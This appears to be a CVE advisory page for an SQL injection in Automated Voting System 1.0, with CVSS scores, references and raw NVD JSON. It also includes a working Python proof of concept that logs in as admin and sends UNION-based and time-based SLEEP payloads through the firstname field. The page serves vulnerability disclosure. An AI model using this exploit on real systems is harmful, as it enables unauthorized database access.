CVE-2025-11667

Description

A vulnerability was found in code-projects Automated Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_candidate_modal.php.. The manipulation of the argument firstname results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:automated_voting_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Automated Voting System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11667 - Automated Voting System SQL Injection PoC
# Vulnerability: SQL Injection in /admin/add_candidate_modal.php (firstname parameter)
# Author: Security Researcher

import requests

TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/add_candidate_modal.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Step 1: Login to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/admin/login.php"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Craft SQL injection payload for firstname parameter
# Payload: Extract database version and current user via UNION-based injection
sql_payload = "test' UNION SELECT 1,user(),database(),version(),5-- -"

# Step 3: Send malicious request to the vulnerable endpoint
inject_url = f"{TARGET_URL}{ADMIN_PATH}"
inject_data = {
    "firstname": sql_payload,
    "lastname": "test",
    "position": "1",
    "submit": "Save"
}

response = session.post(inject_url, data=inject_data)
print(f"[*] Injection response status: {response.status_code}")
print(f"[*] Response body:\n{response.text}")

# Step 4: Alternative - Time-based blind SQL injection test
time_payload = "test' AND SLEEP(5)-- -"
time_data = {
    "firstname": time_payload,
    "lastname": "test",
    "position": "1",
    "submit": "Save"
}

import time
start_time = time.time()
response = session.post(inject_url, data=time_data)
elapsed = time.time() - start_time
print(f"[*] Time-based test elapsed: {elapsed:.2f}s (expect >5s if vulnerable)")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11667
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11667
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11667/
[4] VulDB https://vuldb.com/cve/CVE-2025-11667
[5] https://code-projects.org/
[6] https://github.com/daminqaq/damin-CVE/issues/1
[7] https://vuldb.com/?ctiid.328087
[8] https://vuldb.com/?id.328087
[9] https://vuldb.com/?submit.673203

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11667", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:39.533", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Automated Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_candidate_modal.php.. The manipulation of the argument firstname results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:automated_voting_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF77EC17-84D7-4FE6-8646-FE46104C4880"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/daminqaq/damin-CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328087", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328087", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673203", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}